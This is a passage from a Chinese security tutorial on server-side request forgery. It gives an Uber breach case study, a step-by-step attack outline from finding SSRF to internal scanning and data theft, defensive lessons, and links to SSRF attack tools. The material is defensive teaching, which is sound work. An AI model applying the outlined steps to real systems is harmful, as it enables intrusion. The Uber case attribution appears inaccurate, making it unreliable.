公司:Uber 漏洞:SSRF 访问内网 影响:5700 万用户 后果:1 亿美元和解 ``` **攻击流程**: ``` 1. 发现 SSRF - 文件导入功能 - 存在 SSRF 漏洞 2. 扫描内网 - 发现内部服务 - 识别敏感服务 3. 访问服务 - 访问内部 API - 获取凭证 4. 权限提升 - 使用凭证 - 访问数据库 5. 数据泄露 - 5700 万用户 - 司机信息 - 个人信息 ``` **教训**: ``` 1. 输入验证 - URL 白名单 - 协议限制 2. 网络隔离 - 内网分段 - 防火墙规则 3. 监控告警 - 异常访问 - 内网扫描 ``` --- ## 总结与思考 ### 核心要点回顾 1. **SSRF 原理** - 服务器发起请求 - 访问内部资源 - 协议滥用 2. **利用场景** - 内网扫描 - 服务利用 - 云元数据 3. **防护策略** - 输入验证 - 网络隔离 - 运行时防护 ### 深入思考问题 1. **云原生 SSRF**? - 服务网格 - 容器环境 - Serverless 2. **自动化检测**? - AI 辅助 - 行为分析 - 异常检测 3. **零信任防护**? - 持续验证 - 微隔离 - 动态授权 ### 实战建议 **开发人员**: 1. 输入验证 2. URL 白名单 3. 协议限制 4. 网络隔离 **安全人员**: 1. SSRF 扫描 2. 渗透测试 3. 监控告警 4. 事件响应 **架构师**: 1. 网络设计 2. 服务隔离 3. 出站控制 4. 监控审计 --- ## 参考资料 ### 学习资源 - [OWASP SSRF](https://owasp.org/www-community/attacks/Server_Side_Request_Forgery) - [SSRF Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html) - [AWS SSRF Protection](https://aws.amazon.com/blogs/security/defense-in-depth-open-firewalls-reverse-proxies-ssrf-vulnerabilities-ec2-instance-metadata-service/) ### 工具资源 - [SSRFmap](https://github.com/swisskyrepo/SSRFmap) - [Gopherus](https://github.com/tarunkant/Gopherus) - [SSRF Testing](https://github.com/detectify/ssrf-asset-zonelist) ### 书籍推荐 - 《Web 安全深度剖析》 - 《SSRF 攻防实战》 - 《Cloud Security》 ### 在线资源 - [PayloadsAllTheThings SSRF](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) - [HackTricks SSRF](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery) - [SSRF Wiki](https://ssrf.gitbook.io/) --- **标记 明日预告**:Day 67 - 文件上传漏洞进阶 > 本文内容仅供学习和研究使用,请勿用于非法目的。所有实验请在隔离环境中进行。 --- *本文是 365 天信息安全技术系列的第 66 篇,Web 安全部分第 36 篇,精编版本*
myh0st
2026年4月13日 23:16
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